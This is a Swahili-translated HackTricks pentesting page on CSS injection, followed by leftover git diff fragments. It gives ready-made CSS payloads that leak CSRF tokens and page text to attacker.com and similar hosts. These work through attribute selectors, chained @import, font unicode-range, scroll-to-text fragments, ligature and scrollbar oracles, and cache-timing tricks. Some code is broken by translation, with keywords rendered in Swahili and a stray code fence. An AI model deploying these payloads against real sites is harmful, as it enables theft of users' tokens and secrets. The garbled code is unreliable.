hacktricks/pentesting-web/xs-search/css-injection/README.md

# Kuingiza CSS

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

**Kikundi cha Usalama cha Kujitahidi Kwa Bidii**

<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

***

## Kuingiza CSS

### Chaguo la Sifa

Vichaguzi vya CSS vimeundwa kulingana na thamani za sifa za `jina` na `thamani` ya kipengele cha `input`. Ikiwa thamani ya sifa ya kipengele cha `input` inaanza na herufi maalum, rasilimali ya nje iliyopangwa huload:
```css
input[name=csrf][value^=a]{
background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf][value^=b]{
background-image: url(https://attacker.com/exfil/b);
}
/* ... */
input[name=csrf][value^=9]{
background-image: url(https://attacker.com/exfil/9);
}
```
Hata hivyo, njia hii inakabiliwa na kikwazo wakati wa kushughulikia vipengele vya pembejeo vilivyofichwa (`type="hidden"`) kwa sababu vipengele vilivyofichwa havipakii mandharinyuma.

#### Kupita kwa Vipengele Vilivyofichwa

Ili kuzunguka kikwazo hiki, unaweza kulenga kipengele cha ndugu kinachofuata kwa kutumia kielekezi cha ndugu wa jumla `~`. Sheria ya CSS basi inatumika kwa ndugu wote wanaofuata kipengele kilichofichwa cha pembejeo, ikisababisha picha ya mandharinyuma kupakia:
```css
input[name=csrf][value^=csrF] ~ * {
background-image: url(https://attacker.com/exfil/csrF);
}
```
#### Mahitaji ya Kuingiza CSS

Ili mbinu ya Kuingiza CSS iwe na ufanisi, lazima kuna hali fulani zilizokidhi:

1. **Urefu wa Mzigo**: Vector ya kuingiza CSS lazima iweze kusaidia mizigo ya kutosha kuingiza machaguo yaliyoundwa.
2. **Upya wa CSS**: Unapaswa kuwa na uwezo wa kuunda ukurasa, ambao ni muhimu kusababisha upya wa CSS na mizigo iliyozalishwa kwa upya.
3. **Rasilimali za Nje**: Mbinu hii inahitaji uwezo wa kutumia picha zilizohifadhiwa nje. Hii inaweza kuzuiliwa na Sera ya Usalama wa Yaliyomo (CSP) ya tovuti.

### Chaguo la Kipofu la Mchaguzi wa Sifa

Kama [**ilivyoelezwa katika chapisho hili**](https://portswigger.net/research/blind-css-exfiltration), inawezekana kuunganisha wachaguzi **`:has`** na **`:not`** kutambua yaliyomo hata kutoka kwa vipengele vipofu. Hii ni muhimu sana unapokuwa huna wazo la kilichomo ndani ya ukurasa wa wavuti unaoingiza CSS.\
Pia inawezekana kutumia wachaguzi hao kutolea habari kutoka kwa vikundi kadhaa vya aina ile ile kama vile:
```html
<style>
html:has(input[name^="m"]):not(input[name="mytoken"]) {
background:url(/m);
}
</style>
<input name=mytoken value=1337>
<input name=myname value=gareth>
```
Kwa kuunganisha hii na **mbinu ya @import** ifuatayo, niwezekanavyo kuchota **maarifa mengi kwa kutumia CSS injection kutoka kurasa za vipofu na** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**

### @import

Mbinu ya awali ina mapungufu fulani, angalia vigezo. Unahitaji kuwa na uwezo wa **kupeleka viungo vingi kwa muathiriwa**, au unahitaji kuwa na uwezo wa **kuweka CSS injection katika ukurasa unaoweza kudhurika na iframe**.

Hata hivyo, kuna mbinu nyingine nzuri inayotumia **CSS `@import`** kuboresha ubora wa mbinu.

Hii ilionyeshwa kwanza na [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) na inafanya kazi kama ifuatavyo:

Badala ya kupakia ukurasa huo mara kwa mara na zaidi ya payloads tofauti kila wakati (kama ilivyokuwa hapo awali), tutakuwa **tunapakia ukurasa mara moja tu na kwa kuingiza kwa seva ya mshambuliaji** (hii ndio payload ya kutuma kwa muathiriwa):
```css
@import url('//attacker.com:5001/start?');
```
1. Import itapokea **CSS script** kutoka kwa wachomozaji na **kivinjari kitaiload**.
2. Sehemu ya kwanza ya CSS script wachomozaji watatuma ni **`@import` nyingine kwa server ya wachomozaji tena**.
3. Server ya wachomozaji haitajibu ombi hili bado, kwani tunataka kuvuja herufi fulani kisha kujibu ombi hili na mzigo wa kuvuja wengine.
4. Sehemu ya pili na kubwa ya mzigo itakuwa **mzigo wa kuvuja wa chaguo la sifa**.
5. Hii itatuma kwa server ya wachomozaji **herufi ya kwanza ya siri na ya mwisho**.
6. Mara server ya wachomozaji imepokea **herufi ya kwanza na ya mwisho ya siri**, itajibu **import iliyotakiwa katika hatua ya 2**.
7. Majibu yatakuwa sawa na **hatua 2, 3 na 4**, lakini wakati huu itajaribu **kupata herufi ya pili ya siri na kisha ya pili kutoka mwisho**.

Mchomozaji ataendelea **mpaka afanikiwe kuvuja siri kabisa**.

Unaweza kupata [**msimbo wa Pepe Vila wa kutumia hii hapa**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) au unaweza kupata karibu [**mimso wa msimbo lakini ulioandikwa hapa**.](./#css-injection)

{% hint style="info" %}
Msimbo utajaribu kugundua herufi 2 kila wakati (kutoka mwanzoni na mwishoni) kwa sababu chaguo la sifa linaruhusu kufanya mambo kama:
```css
/* value^=  to match the beggining of the value*/
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}

/* value$=  to match the ending of the value*/
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
```
Hii inaruhusu script kuvuja siri haraka.
{% endhint %}

{% hint style="warning" %}
Wakati mwingine script **haigundui kwa usahihi kwamba kipimo cha awali + kipimo cha mwisho kilichopatikana tayari ni bendera kamili** na itaendelea mbele (kwenye kipimo cha awali) na nyuma (kwenye kipimo cha mwisho) na wakati fulani itasimama.\
Usiwe na wasiwasi, tuangalie **matokeo** kwa sababu **unaweza kuona bendera hapo**.
{% endhint %}

### Selectors Nyingine

Njia nyingine za kufikia sehemu za DOM na **vichaguzi vya CSS**:

* **`.class-to-search:nth-child(2)`**: Hii itatafuta kipengee cha pili chenye darasa "class-to-search" kwenye DOM.
*   Chaguzi ya **`:empty`**: Hutumiwa kwa mfano katika [**hii writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**

```css
[role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }
```

### XS-Search Inayotegemea Makosa

**Marejeo:** [Shambulio la Kulingana na CSS: Kutumia unicode-range ya @font-face](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [XS-Search PoC Inayotegemea Makosa na @terjanq](https://twitter.com/terjanq/status/1180477124861407234)

Nia kuu ni **kutumia fonti ya desturi kutoka kwa kituo kilichodhibitiwa** na kuhakikisha kwamba **maandishi (katika kesi hii, 'A') yanavyoonyeshwa na fonti hii tu ikiwa rasilimali iliyotajwa (`favicon.ico`) haiwezi kupakia**.
```html
<!DOCTYPE html>
<html>
<head>
<style>
@font-face{
font-family: poc;
src: url(http://attacker.com/?leak);
unicode-range:U+0041;
}

#poc0{
font-family: 'poc';
}

</style>
</head>
<body>

<object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
</body>
</html>
```
1. **Matumizi ya Fonti ya Kipekee**:
   - Fonti ya kipekee inadefiniwa kwa kutumia sheria ya `@font-face` ndani ya lebo ya `<style>` katika sehemu ya `<head>`.
   - Fonti inaitwa `poc` na inapakuliwa kutoka kwa mwisho wa nje (`http://attacker.com/?leak`).
   - Mali ya `unicode-range` imewekwa kuwa `U+0041`, ikilenga herufi maalum ya Unicode 'A'.

2. **Kipengele cha Kitu na Nakala ya Mbadala**:
   - Kipengele cha `<object>` chenye `id="poc0"` kinajengwa katika sehemu ya `<body>`. Kipengele hiki kinajaribu kupakia rasilimali kutoka `http://192.168.0.1/favicon.ico`.
   - `font-family` kwa kipengele hiki imewekwa kuwa `'poc'`, kama ilivyoelezwa katika sehemu ya `<style>`.
   - Ikiwa rasilimali (`favicon.ico`) haiwezi kupakia, maudhui ya mbadala (herufi 'A') ndani ya lebo ya `<object>` yataonyeshwa.
   - Maudhui ya mbadala ('A') yatachorwa kutumia fonti ya kipekee `poc` ikiwa rasilimali ya nje haiwezi kupakia.
```css
:target::before { content : url(target.png) }
```
Katika hali kama hizo, ikiwa maandishi "Msimamizi" yapo kwenye ukurasa, rasilimali `target.png` inaombwa kutoka kwenye seva, ikionyesha uwepo wa maandishi hayo. Kisa cha shambulio hili kinaweza kutekelezwa kupitia URL iliyoundwa kwa uangalifu ambayo inaingiza CSS iliyoinuliwa pamoja na kipande cha maandishi ya kusogeza:
```
http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
```
Hapa, shambulio linabadilisha uingizaji wa HTML ili kuhamisha nambari ya CSS, lengo likiwa ni maandishi maalum "Msimamizi" kupitia kipande cha Scroll-to-text (`#:~:text=Administrator`). Ikiwa maandishi yamepatikana, rasilimali iliyoelekezwa hupakiwa, ikionyesha uwepo wake kwa bahati mbaya kwa muhusika.

Kwa kupunguza madhara, mambo yafuatayo yanapaswa kuzingatiwa:

1. **Ulinganishi wa STTF uliopunguzwa**: Kipande cha Scroll-to-text Fragment (STTF) kimeundwa kulinganisha tu maneno au sentensi, hivyo kupunguza uwezo wake wa kufichua siri au vitambulisho vya aina yoyote.
2. **Kizuizi kwa Muktadha wa Kivinjari cha Juu**: STTF inafanya kazi tu katika muktadha wa juu wa kivinjari na haifanyi kazi ndani ya iframes, hivyo kufanya jaribio lolote la unyonyaji kuwa dhahiri zaidi kwa mtumiaji.
3. **Hitaji la Kuchochewa na Mtumiaji**: STTF inahitaji ishara ya kuchochewa na mtumiaji ili kufanya kazi, maana yake unyonyaji unawezekana tu kupitia urambazaji ulioanzishwa na mtumiaji. Mahitaji haya yanapunguza kwa kiasi kikubwa hatari ya mashambulizi kufanywa kiotomatiki bila ushirikiano wa mtumiaji. Hata hivyo, mwandishi wa chapisho la blogu anabainisha hali maalum na njia za kuepuka (k.m., uhandisi wa kijamii, mwingiliano na programu-jalizi maarufu za kivinjari) ambazo zinaweza kufanya unyonyaji kuwa rahisi.

Kuwa na ufahamu wa mifumo hii na mapungufu yanayowezekana ni muhimu kwa kudumisha usalama wa wavuti na kulinda dhidi ya mikakati ya unyonyaji kama hiyo.

Kwa maelezo zaidi angalia ripoti asili: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)

Unaweza kuangalia [**kutumia mbinu hii kwa CTF hapa**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).

### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>

Unaweza kubainisha **fonti za nje kwa thamani maalum za unicode** ambazo zitakusanywa tu **ikiwa thamani hizo za unicode zitapatikana** kwenye ukurasa. Kwa mfano:
```html
<style>
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?A); /* fetched */
unicode-range:U+0041;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?B); /* fetched too */
unicode-range:U+0042;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?C); /* not fetched */
unicode-range:U+0043;
}
#sensitive-information{
font-family:poc;
}
</style>

<p id="sensitive-information">AB</p>htm
```
### Uchomaji wa nodi ya maandishi (I): ligatures <a href="#uchomaji-wa-nodi-ya-maandishi-i-ligatures" id="uchomaji-wa-nodi-ya-maandishi-i-ligatures"></a>

**Kumbukumbu:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)

Mbinu iliyoelezwa inahusisha kutoa maandishi kutoka kwa nodi kwa kutumia ligatures ya fonti na kufuatilia mabadiliko ya upana. Mchakato unajumuisha hatua kadhaa:

1. **Uundaji wa Fonti za Desturi**:
- Fonti za SVG zinatengenezwa na glyphs zenye sifa ya `horiz-adv-x`, ambayo huanzisha upana mkubwa kwa glyph inayowakilisha mfululizo wa wahusika wawili.
- Mfano wa glyph ya SVG: `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, ambapo "XY" inaashiria mfululizo wa wahusika wawili.
- Fonti hizi kisha hubadilishwa kuwa muundo wa woff kwa kutumia fontforge.

2. **Uchunguzi wa Mabadiliko ya Upana**:
- CSS hutumiwa kuhakikisha kuwa maandishi hayajipindi (`white-space: nowrap`) na kubinafsisha mtindo wa scrollbar.
- Kuonekana kwa scrollbar ya usawa, iliyopambwa kwa njia tofauti, hufanya kama kiashiria (oracle) kwamba ligature maalum, na hivyo mfululizo maalum wa wahusika, upo katika maandishi.
- CSS inayohusika:
```css
mwili { white-space: nowrap };
mwili::-webkit-scrollbar { background: blue; }
mwili::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }
```

3. **Mchakato wa Kutumia**:
- **Hatua 1**: Fonti zinaundwa kwa jozi za wahusika wenye upana mkubwa.
- **Hatua 2**: Mbinu ya udanganyifu inatumika kutambua wakati glyph kubwa ya upana (ligature kwa jozi ya wahusika) inapojengwa, ikionyesha uwepo wa mfululizo wa wahusika.
- **Hatua 3**: Baada ya kutambua ligature, glyphs mpya zinazowakilisha mfululizo wa wahusika watatu zinaundwa, zikiingiza jozi iliyogunduliwa na kuongeza wahusika wa awali au wafuatao.
- **Hatua 4**: Uchunguzi wa ligature ya wahusika watatu unafanywa.
- **Hatua 5**: Mchakato unarudia, ukifunua taratibu maandishi yote.

4. **Uboreshaji**:
- Mbinu ya sasa ya kuanzisha kutumia `<meta refresh=...` sio bora.
- Njia yenye ufanisi zaidi inaweza kuhusisha mbinu ya CSS ya `@import`, ikiboresha utendaji wa kutumia mbinu hii.

### Uchomaji wa nodi ya maandishi (II): kuvuja kwa seti ya wahusika na fonti ya msingi (bila kuhitaji mali za nje) <a href="#uchomaji-wa-nodi-ya-maandishi-ii-kuvuja-kwa-seti-ya-wahusika-na-fonti-ya-msingi" id="uchomaji-wa-nodi-ya-maandishi-ii-kuvuja-kwa-seti-ya-wahusika-na-fonti-ya-msingi"></a>

**Kumbukumbu:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)

Ujanja huu ulitolewa katika [**Mjadala wa Slackers**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with_single\_css\_injection/). Seti ya wahusika inayotumiwa katika nodi ya maandishi inaweza kuvuja **kwa kutumia fonti za msingi** zilizosanikishwa kwenye kivinjari: hakuna fonti za nje -au desturi- inahitajika.

Mbinu hii inahusisha kutumia uhuishaji kuongeza kwa hatua kwa hatua upana wa `div`, kuruhusu wahusika mmoja baada ya mwingine kusonga kutoka sehemu ya 'suffix' ya maandishi kwenda sehemu ya 'prefix'. Mchakato huu unagawa kwa ufanisi maandishi katika sehemu mbili:

1. **Awali**: Mstari wa kwanza.
2. **Suffix**: Mstari unaofuata.

Hatua za mpito za wahusika zitaonekana kama ifuatavyo:

**C**\
ADB

**CA**\
DB

**CAD**\
B

**CADB**


Wakati wa mpito huu, **njama ya unicode-range** inatumika kutambua kila wahusika mpya wanapojiunga na awali. Hii inafanikishwa kwa kubadilisha fonti kuwa Comic Sans, ambayo ni refu kuliko fonti ya msingi, hivyo kusababisha scrollbar ya wima. Kuonekana kwa scrollbar hii kunafunua kwa njia isiyo ya moja kwa moja uwepo wa wahusika wapya katika awali.

Ingawa mbinu hii inaruhusu kutambua wahusika wa kipekee wanapoonekana, haitoi maelezo ya ni wahusika gani wanarudiwa, tu kwamba kurudi kumetokea.

{% hint style="info" %}
Kimsingi, **unicode-range hutumiwa kutambua wahusika**, lakini kwa kuwa hatutaki kupakia fonti ya nje, tunahitaji kupata njia nyingine.\
Wakati **wahusika** unapopatikana, unapewa **fonti ya Comic Sans iliyosanikishwa tayari**, ambayo **inafanya** wahusika **kuwa wakubwa** na **kuzindua scrollbar** ambayo ita**vujisha wahusika uliopatikana**.
{% endhint %}

Angalia nambari iliyochimbuliwa kutoka kwa PoC:
```css
/* comic sans is high (lol) and causes a vertical overflow */
@font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
@font-face{font-family:has_B;src:local('Comic Sans MS');unicode-range:U+42;font-style:monospace;}
@font-face{font-family:has_C;src:local('Comic Sans MS');unicode-range:U+43;font-style:monospace;}
@font-face{font-family:has_D;src:local('Comic Sans MS');unicode-range:U+44;font-style:monospace;}
@font-face{font-family:has_E;src:local('Comic Sans MS');unicode-range:U+45;font-style:monospace;}
@font-face{font-family:has_F;src:local('Comic Sans MS');unicode-range:U+46;font-style:monospace;}
@font-face{font-family:has_G;src:local('Comic Sans MS');unicode-range:U+47;font-style:monospace;}
@font-face{font-family:has_H;src:local('Comic Sans MS');unicode-range:U+48;font-style:monospace;}
@font-face{font-family:has_I;src:local('Comic Sans MS');unicode-range:U+49;font-style:monospace;}
@font-face{font-family:has_J;src:local('Comic Sans MS');unicode-range:U+4a;font-style:monospace;}
@font-face{font-family:has_K;src:local('Comic Sans MS');unicode-range:U+4b;font-style:monospace;}
@font-face{font-family:has_L;src:local('Comic Sans MS');unicode-range:U+4c;font-style:monospace;}
@font-face{font-family:has_M;src:local('Comic Sans MS');unicode-range:U+4d;font-style:monospace;}
@font-face{font-family:has_N;src:local('Comic Sans MS');unicode-range:U+4e;font-style:monospace;}
@font-face{font-family:has_O;src:local('Comic Sans MS');unicode-range:U+4f;font-style:monospace;}
@font-face{font-family:has_P;src:local('Comic Sans MS');unicode-range:U+50;font-style:monospace;}
@font-face{font-family:has_Q;src:local('Comic Sans MS');unicode-range:U+51;font-style:monospace;}
@font-face{font-family:has_R;src:local('Comic Sans MS');unicode-range:U+52;font-style:monospace;}
@font-face{font-family:has_S;src:local('Comic Sans MS');unicode-range:U+53;font-style:monospace;}
@font-face{font-family:has_T;src:local('Comic Sans MS');unicode-range:U+54;font-style:monospace;}
@font-face{font-family:has_U;src:local('Comic Sans MS');unicode-range:U+55;font-style:monospace;}
@font-face{font-family:has_V;src:local('Comic Sans MS');unicode-range:U+56;font-style:monospace;}
@font-face{font-family:has_W;src:local('Comic Sans MS');unicode-range:U+57;font-style:monospace;}
@font-face{font-family:has_X;src:local('Comic Sans MS');unicode-range:U+58;font-style:monospace;}
@font-face{font-family:has_Y;src:local('Comic Sans MS');unicode-range:U+59;font-style:monospace;}
@font-face{font-family:has_Z;src:local('Comic Sans MS');unicode-range:U+5a;font-style:monospace;}
@font-face{font-family:has_0;src:local('Comic Sans MS');unicode-range:U+30;font-style:monospace;}
@font-face{font-family:has_1;src:local('Comic Sans MS');unicode-range:U+31;font-style:monospace;}
@font-face{font-family:has_2;src:local('Comic Sans MS');unicode-range:U+32;font-style:monospace;}
@font-face{font-family:has_3;src:local('Comic Sans MS');unicode-range:U+33;font-style:monospace;}
@font-face{font-family:has_4;src:local('Comic Sans MS');unicode-range:U+34;font-style:monospace;}
@font-face{font-family:has_5;src:local('Comic Sans MS');unicode-range:U+35;font-style:monospace;}
@font-face{font-family:has_6;src:local('Comic Sans MS');unicode-range:U+36;font-style:monospace;}
@font-face{font-family:has_7;src:local('Comic Sans MS');unicode-range:U+37;font-style:monospace;}
@font-face{font-family:has_8;src:local('Comic Sans MS');unicode-range:U+38;font-style:monospace;}
@font-face{font-family:has_9;src:local('Comic Sans MS');unicode-range:U+39;font-style:monospace;}
@font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF}

div.leak {
overflow-y: auto; /* leak channel */
overflow-x: hidden; /* remove false positives */
height: 40px; /* comic sans capitals exceed this height */
font-size: 0px; /* make suffix invisible */
letter-spacing: 0px; /* separation */
word-break: break-all; /* small width split words in lines */
font-family: rest; /* default */
background: grey; /* default */
width: 0px; /* initial value */
animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
}

div.leak::first-line{
font-size: 30px; /* prefix is visible in first line */
text-transform: uppercase; /* only capital letters leak */
}

/* iterate over all chars */
@keyframes trychar {
0% { font-family: rest; } /* delay for width change */
5% { font-family: has_A, rest; --leak: url(?a); }
6% { font-family: rest; }
10% { font-family: has_B, rest; --leak: url(?b); }
11% { font-family: rest; }
15% { font-family: has_C, rest; --leak: url(?c); }
16% { font-family: rest }
20% { font-family: has_D, rest; --leak: url(?d); }
21% { font-family: rest; }
25% { font-family: has_E, rest; --leak: url(?e); }
26% { font-family: rest; }
30% { font-family: has_F, rest; --leak: url(?f); }
31% { font-family: rest; }
35% { font-family: has_G, rest; --leak: url(?g); }
36% { font-family: rest; }
40% { font-family: has_H, rest; --leak: url(?h); }
41% { font-family: rest }
45% { font-family: has_I, rest; --leak: url(?i); }
46% { font-family: rest; }
50% { font-family: has_J, rest; --leak: url(?j); }
51% { font-family: rest; }
55% { font-family: has_K, rest; --leak: url(?k); }
56% { font-family: rest; }
60% { font-family: has_L, rest; --leak: url(?l); }
61% { font-family: rest; }
65% { font-family: has_M, rest; --leak: url(?m); }
66% { font-family: rest; }
70% { font-family: has_N, rest; --leak: url(?n); }
71% { font-family: rest; }
75% { font-family: has_O, rest; --leak: url(?o); }
76% { font-family: rest; }
80% { font-family: has_P, rest; --leak: url(?p); }
81% { font-family: rest; }
85% { font-family: has_Q, rest; --leak: url(?q); }
86% { font-family: rest; }
90% { font-family: has_R, rest; --leak: url(?r); }
91% { font-family: rest; }
95% { font-family: has_S, rest; --leak: url(?s); }
96% { font-family: rest; }
}

/* increase width char by char, i.e. add new char to prefix */
@keyframes loop {
0% { width: 0px }
1% { width: 20px }
2% { width: 40px }
3% { width: 60px }
4% { width: 80px }
4% { width: 100px }
```swahili
5% { upana: 120px }
6% { upana: 140px }
7% { upana: 0px }
}

div::-webkit-scrollbar {
background: bluu;
}

/* upande wa channel */
div::-webkit-scrollbar:vertical {
background: bluu var(--leak);
}
```
### Uvujaji wa kipengele cha maandishi (III): kuvuja kwa seti ya herufi kwa kutumia muda wa cache (bila kuhitaji mali za nje) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>

**Marejeleo:** Hii inatajwa kama [suluhisho lisilofanikiwa katika andiko hili](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)

Katika kesi hii, tunaweza kujaribu kuvuja ikiwa herufi iko katika maandishi kwa kupakia font bandia kutoka asili ile ile:
```css
@font-face {
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1);
unicode-range: U+0041;
}
```
If there is a match, the **font will be loaded from `/static/bootstrap.min.css?q=1`**. Ingawa haitapakia kwa mafanikio, **kivinjari kinapaswa kukisakinisha**, na hata kama hakuna cache, kuna **muhimu wa 304 isiyobadilishwa**, hivyo **jibu linapaswa kuwa haraka** kuliko mambo mengine.

Hata hivyo, ikiwa tofauti ya muda kati ya jibu lililosakinishwa na lile lisilosakinishwa si kubwa vya kutosha, hii haitakuwa na manufaa. Kwa mfano, mwandishi alitaja: Hata hivyo, baada ya majaribio, niligundua kuwa tatizo la kwanza ni kwamba kasi si tofauti sana, na tatizo la pili ni kwamba boti hutumia bendera ya `disk-cache-size=1`, ambayo ni ya kufikiria kweli.

### Uchimbaji wa nodi ya maandishi (III): kuvuja kwa seti ya herufi kwa kupima kupakia mamia ya "fonti" za ndani (bila kuhitaji mali za nje) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>

**Marejeo:** Hii imeelezwa kama [suluhisho lisilofanikiwa katika andiko hili](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)

Katika kesi hii unaweza kuonyesha **CSS kupakia mamia ya fonti bandia** kutoka asili ile ile wakati kuna mechi inatokea. Kwa njia hii unaweza **kupima muda** unaochukua na kugundua ikiwa herufi inaonekana au la kwa kitu kama:
```css
@font-face {
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1),
url(/static/bootstrap.min.css?q=2),
....
url(/static/bootstrap.min.css?q=500);
unicode-range: U+0041;
}
```
Na msimbo wa boti unaonekana kama huu:
```python
browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)
```
Kwa hivyo, ikiwa herufi hazilingani, wakati wa majibu unapotembelea bot inatarajiwa kuwa takriban sekunde 30. Walakini, ikiwa kuna mechi ya herufi, maombi mengi yatapelekwa kupata herufi, ikisababisha mtandao kuwa na shughuli endelevu. Kama matokeo, itachukua muda mrefu kutimiza hali ya kusimamisha na kupokea majibu. Kwa hivyo, muda wa majibu unaweza kutumika kama kiashiria cha kubaini ikiwa kuna mechi ya herufi.

## Marejeo

* [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
* [https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b](https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b)
* [https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d](https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d)
* [https://x-c3ll.github.io/posts/CSS-Injection-Primitives/](https://x-c3ll.github.io/posts/CSS-Injection-Primitives/)

**Kikundi cha Usalama cha Kujaribu Kwa Bidii**

<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

<details>

<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								# Kuingiza CSS
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Njia nyingine za kusaidia HackTricks:
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
 								* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
 								* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
